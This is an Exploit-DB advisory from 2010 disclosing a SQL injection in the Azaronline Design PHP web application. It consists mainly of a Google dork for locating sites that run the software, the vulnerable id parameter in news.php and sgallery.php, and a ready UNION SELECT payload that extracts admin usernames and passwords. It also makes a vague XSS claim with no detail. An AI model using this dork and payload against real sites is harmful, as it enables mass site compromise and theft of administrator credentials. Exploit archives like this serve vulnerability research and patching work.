Azaronline Design - SQL Injection

EDB-ID:

15391

CVE:

N/A

Author:

XroGuE

Type:

webapps

Platform:

PHP

Published:

2010-11-02

########################################################################
# Name: Azaronline Design SQL Injection Vulnerability
# Vendor: http://azaronline.com
# Date: 2010-11-02
# Author: XroGuE
# Thanks to: Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: Inj3ct0r.com
########################################################################
########################################################################
 
[+] Dork: intext:"Powered By Azaronline.com"
 
########################################################################
 
[+] SQL InjecTion Vulnerability:
 
[+] vuln: http://[site]/[path]/[news.php],[sgallery.php],[etc]?id=[SQLi]

[+] XPL : UNION all SELECT 1,2,group_Concat(user,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from admin
 
########################################################################

[+] XSS/HTML InjecTion Vulnerability:

[+] vuln: [SearCh And Find It :P]

########################################################################